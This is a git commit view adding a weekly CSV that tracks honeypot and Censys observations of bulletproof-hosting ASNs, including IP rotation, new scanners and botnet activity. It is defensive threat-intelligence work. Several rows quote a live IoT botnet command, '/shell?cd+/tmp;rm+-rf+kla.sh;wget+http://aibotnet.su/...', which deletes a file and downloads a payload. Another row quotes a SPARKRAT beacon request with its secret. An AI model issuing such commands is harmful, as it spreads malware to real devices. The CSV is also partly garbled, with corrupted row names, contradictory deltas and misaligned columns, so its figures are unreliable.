aboutsummaryrefslogtreecommitdiff
path: root/kevlar/2026-07-20/changes/diff-vs-prior-week.csv
diff options
context:
space:
mode:
authorhrbrmstr <bob@rud.is>2026-07-20 07:23:29 -0400
committerhrbrmstr <bob@rud.is>2026-07-20 07:23:29 -0400
commit805ce54d6b181cdaab453e7e50cfac14cc371b6a (patch)
treec04619314bcaf6eaa728a670f4de97c9aa45a26c /kevlar/2026-07-20/changes/diff-vs-prior-week.csv
parenta47b685eac21aeedad5c4ab5df5c67a1df905486 (diff)
chore: weekly asn update
Diffstat (limited to 'kevlar/2026-07-20/changes/diff-vs-prior-week.csv')
-rw-r--r--kevlar/2026-07-20/changes/diff-vs-prior-week.csv28
1 files changed, 28 insertions, 0 deletions
diff --git a/kevlar/2026-07-20/changes/diff-vs-prior-week.csv b/kevlar/2026-07-20/changes/diff-vs-prior-week.csv
new file mode 100644
index 0000000..b63947c
--- /dev/null
+++ b/kevlar/2026-07-20/changes/diff-vs-prior-week.csv
@@ -0,0 +1,28 @@
+metric,asn,asn_org,prior_value,current_value,delta,delta_pct,category,notes
+active_asns,total,,15,17,+2,+13%,expansion,"2 new ASNs active: AS209847 (sponge 998 sessions via m/cross-AS FORTIS path), AS30823 (single benign-looking Android HTTPS connection). 2 ASNs dropped to 0: AS140666 lost census coverage (was 588 prior week); AS206728/AS216309/AS58854/AS202685/AS394711 continue dormant."
+event_volume_AS51396,AS51396,Pfcloud UG,10000+,2500+ (sponge 10K hyperactive 22/80/8080/27017/5678),-7500,-75%,decrease,"Honeylabs event count notably down (~2500 summed) -- likely fewer honeypot target hits this week. Sponge volume still 10K+ (capped); top IP 204.76.203.18 hits 13766 sponge sessions -- NEW top IP, last top IP was 176.65.148.25 (473 events Honeylabs)."
+ip_rotation_AS51396,AS51396,Pfcloud UG,204.76.203.78/79/80,204.76.203.18/.30/.49/.81,+4,new,-,new,"Coordinated 204.76.203.x scan-cluster persists in cluster identity but rotates specific IPs week-to-week -- botnet operator using lower-numbered IPs this week."
+event_volume_AS200593,AS200593,Prospero Ooo,3890,968,-2922,-75%,decrease,"Volume sharp decrease. Still the same TM-based IP 91.202.233.79 doing scanning hit-and-run. Censys showed 0 census hosts this week -- infra fully withdrawn from public scanscape."
+event_volume_AS198953,AS198953,Proton66 OOO,539,810,+271,+50%,increase,"Top IP rotated: 176.120.22.240 -> 176.120.22.16 (759 sponge events, GreyNoise suspicious). Multi-protocol brute sustained."
+event_volume_AS51852,AS51852,Private Layer INC,1802,264,+1538,-85%,decrease,"Top IP rotated: 179.43.134.114 -> 81.17.28.130 (CH Bellinzona). Event volume dropped bit still active. Lower-IPv4 noise suggests IP rotation."
+event_volume_AS14956,AS14956,RouterHosting LLC,206,128,-78,-38%,decrease,"Persistent multi CVE scanning. PMTA-Auto UA now active + persistent Minecraft server port 25565 reconnaissance + anydesk RDP scanning. Censys shows new fofa_monitor panel."
+event_volume_AS214940,AS214940,Kprohost LLC,46,42,-4,-9%,stable,"Stable - low volume HTTPS scanning with rotating browser UAs (20+ UAs this week). RP. Censys shows BULLETPROOF, port 443 dominant."
+event_volume_AS200651,AS200651,FlokiNET ehf,20,18,-2,-10%,stable,"Tor exit stable. OpenSSH upgraded from 10.1 -> 10.2p1. NEW: SPARKRAT-related POST /api/client/update?arch=amd64&commit=08059e95...&os=windows pattern detected; GreyNoise observed SPARKRAT tag."
+event_volume_AS57043,AS57043,Hostkey B.v.,1,3,+2,+200%,increase,"Single IP 132.243.194.215 from Frankfurt (DE) dropped IoT MIPS downloader /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su PORT 6001. Censys forward DNS odamanov600.ru. Netaxis Group Ltd (CY) registered March 2026 (~4 months ago). HASSH fingerprint meaningless (HTTP-only port 6001 probe, no SSH)."
+event_volume_AS400992,AS400992,ZhouyiSat Comm,2,0,-2,-100%,drop-off,"No honeylabs events this week. Sponge activity 256 sessions. Censys shows pure WINDOWS admin port profile (3389/5985/135/139/445/47001/5357). New attack orientation: shifted to WMI/RPC brute from prior-week .env URL scanning."
+ip_rotation_AS400992,AS400992,ZhouyiSat,185.228.72.109 (prior),23.172.217.77/185.121.15.184/193.46.218.82,+3,new,-,new,"Full host IP rotatation. Censys shows the 23.172.217.x cluster is a Russian-hosted (DE / IPv6)."
+new_asns,AS209847,(spurious sponge tag; actually AS41745 FORTIS),--activation,998 sessions,+998,new,new,"First time observed via Sponge 998 sessions from single IP 45.144.28.70 (HTTPS port cluster scanning). Censys shows actual AS = FORTIS-AS Baykov Ilya Sergeevich (RU), BGP prefix created 2026-06-06 -- 6 weeks old network. BULLETPROOF label."
+new_asns,AS30823,aurologic GmbH,--no activity,8 sessions + 1 HL,+9,new,new,"9704-host census providers in Censys with robust dual-VIP stack. 0 honeylabs events except single benign HTTPS GET from 41.216.188.21 (DE). Likely commercial small-activity ISP -- may not actually be bulletproof but listed by Censys as BULLETPROOF based on aggregated factors. Treat with caution."
+att这儿enant_drop,AS210644,Aeza Group LLC,1858 hosts census,0 hosts census,-1858,-100%,contraction,"COMPLETE Censys census wipe -- Aeza has withdrawn from public scanscape. May have migrated IPs to alternative AS. Sponge shows 11 sliding sessions."
+att Droplmetric_AS200593,AS200593,Prospero Ooo,1800 hosts census,0 hosts census,-1800,-100%,contraction,"Prospero census vanished while still active honey scanning - they darkened their attack infra (or migrated to alternate BGP like Prospero may have moved to a different hosted sub)."
+new_attack_pattern,AS51396,Pfcloud UG,none,new-UA:odin-scanner/0.4,new,new,new,"New tool signature 'odin-scanner/0.4' observed scanning ports 11235/20128 -- added to make money on the pfcloud scan farm tooling alongside zgrab/Hello World."
+new_attack_pattern,AS200651,FlokiNET/AS,none,sparkrat-update-callback,new,new,new,"New SPARKRAT beaconing pattern POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows -- content-type: application/octet-stream -- secret: 3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2"
+new_attack_pattern,AS198953,Proton66 OOO,none,redis-port-6379,new,new,new,"New Redis probe from 37.77.150.83 -- cache-based reconnaissance (new for Proton66)"
+new_attack_pattern,AS211720,Datashield,none,mssql-tds-brute,new,new,new,"MSSQL TDS probing port 1433 from hostname 'short-tan-rat' (reverse rDNS poisoned)"
+new_attack_pattern,AS57043,HOSTKEY,none,iot-botnet-downloader,new,new,new,"IoT MIPS downloader targeting port 6001 /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh -- new for Hostkey."
+new_attack_pattern,AS14956,ROUTERHOSTING,none,fofa-monitor-panel,new,new,new,"Exposed Werkzeug/Python fofa_monitor Basic realm panel on port 5000 (HIGH misconfig)."
+new_fingerprint,AS51396,Pfcloud,none,odin-scanner-0.4-UA,new,new,new,"Brand-new tooling signature."
+new_fingerprint,AS200651,FlokiNET,none,sparkrat-hassh-upgrade-10.2p1,new,new,new,"HASSH client updated OpenSSH 10.1 -> 10.2p1 (subtle: same HASSH but new banner string). Implies ongoing active maintenance."
+new_fingerprint,AS57043,Hostkey,none,ja4h-777e992b8532-botnet,new,new,new,"Distinctive JA4H for IoT MIPS downloader hardcoded bot calls (/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh)."
+volume_explosion_AS216139,AS216139,Iron Hosting,2100 hosts,2358 hosts,+258,+12%,slight_increase,"Censys growth modest. MAJOR anomaly: NEW sequential port 6001-6050 cluster ~345 sessions each in Censys aggregation -- highly anomalous backconnect-C2 listener pattern detected."
+volume_drop_AS140666,AS140666,ADP / ANY DIGITAL,588 hosts,0 hosts,-588,-100%,contraction,"Disappeared from Censys. Sponge activity almost nil (2 sessions). Likely transited to a different BGP AS or pulled back services." \ No newline at end of file